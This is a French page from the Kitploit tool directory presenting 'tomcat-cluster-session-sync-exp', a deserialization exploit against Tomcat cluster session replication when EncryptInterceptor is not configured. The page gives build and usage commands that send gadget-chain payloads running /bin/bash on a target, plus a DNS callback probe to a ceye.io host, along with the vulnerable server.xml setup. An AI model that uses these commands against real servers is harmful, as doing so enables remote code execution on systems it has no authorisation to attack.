Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
tomcat-cluster-session-sync-exp — Lorsque Tomcat utilise sa propre fonction de synchronisation de session, une configuration non sécurisée (sans utilisation d'EncryptInterceptor) conduit à une vulnérabilité de désérialisation. En utilisant des paquets soigneusement conçus, il est possible d'attaquer les serveurs utilisant la fonction de synchronisation de session intégrée de Tomcat. PS : Ce n'est pas CVE-2020-9484 ; 9484 est une vulnérabilité de persistance de session, alors que celle-ci concerne la synchronisation de cluster de sessions ! | Kitploit
Outils/GitHubGitHub/threedr3am/tomcat-cluster-session-sync-exp
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed Teaming
GitHubthreedr3am/tomcat-cluster-session-sync-exp

tomcat-cluster-session-sync-exp

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Lorsque Tomcat utilise sa propre fonction de synchronisation de session, une configuration non sécurisée (sans utilisation d'EncryptInterceptor) conduit à une vulnérabilité de désérialisation. En utilisant des paquets soigneusement conçus, il est possible d'attaquer les serveurs utilisant la fonction de synchronisation de session intégrée de Tomcat. PS : Ce n'est pas CVE-2020-9484 ; 9484 est une vulnérabilité de persistance de session, alors que celle-ci concerne la synchronisation de cluster de sessions !

21437il y a 6 ansVérifié par Kitploit
Partager

L'outil est destiné uniquement à la recherche en sécurité et aux audits internes. Il est interdit de l'utiliser pour lancer des attaques illégales. L'utilisateur est responsable des conséquences.

Exploit pour tomcat cluster sync-session

Il s'agit d'une vulnérabilité de désérialisation existant lorsque Tomcat utilise la fonction de synchronisation de session intégrée avec une configuration non sécurisée (absence d'EncryptInterceptor). En construisant soigneusement des paquets de données, il est possible d'attaquer les serveurs utilisant la fonction de synchronisation de session intégrée de Tomcat.

Utilisation

Compilez d'abord le fichier JAR :

root@kitploit:~
mvn clean compile assembly:assembly

Le fichier JAR généré se trouve dans le répertoire target.

Utilisation, exemple :

root@kitploit:~
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

Conditions

  1. Tomcat a activé la synchronisation de session et n'a pas configuré EncryptInterceptor.
  2. La version de JDK est inférieure à JDK8u20 ou JDK7u21 (il peut y avoir des erreurs).
  3. Le point de terminaison de synchronisation est accessible (généralement sur le réseau interne).

Configuration de la synchronisation de session Tomcat

(dans conf/server.xml) :

root@kitploit:~
<Server>
    ...
    
    <Service>
        ...
        
        <Engine>
            ...
            
            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
                    channelSendOptions="6">
            
                    <Manager className="org.apache.catalina.ha.session.BackupManager"
                      expireSessionsOnShutdown="false"
                      notifyListenersOnReplication="true"
                      mapSendOptions="6"/>
            
            
                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
                      <Membership className="org.apache.catalina.tribes.membership.McastService"
                        address="228.0.0.4"
                        port="45564"
                        frequency="500"
                        dropTime="3000"/>
                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
                        address="123.123.123.123"
                        port="5000"
                        selectorTimeout="100"
                        maxThreads="6"/>
            
                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
                      </Sender>
                    </Channel>
            
                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
            
                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
                      tempDir="/tmp/war-temp/"
                      deployDir="/tmp/war-deploy/"
                      watchDir="/tmp/war-listen/"
                      watchEnabled="false"/>
            
                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
            </Cluster>
        </Engine>
  </Service>
</Server>
Télécharger l’outil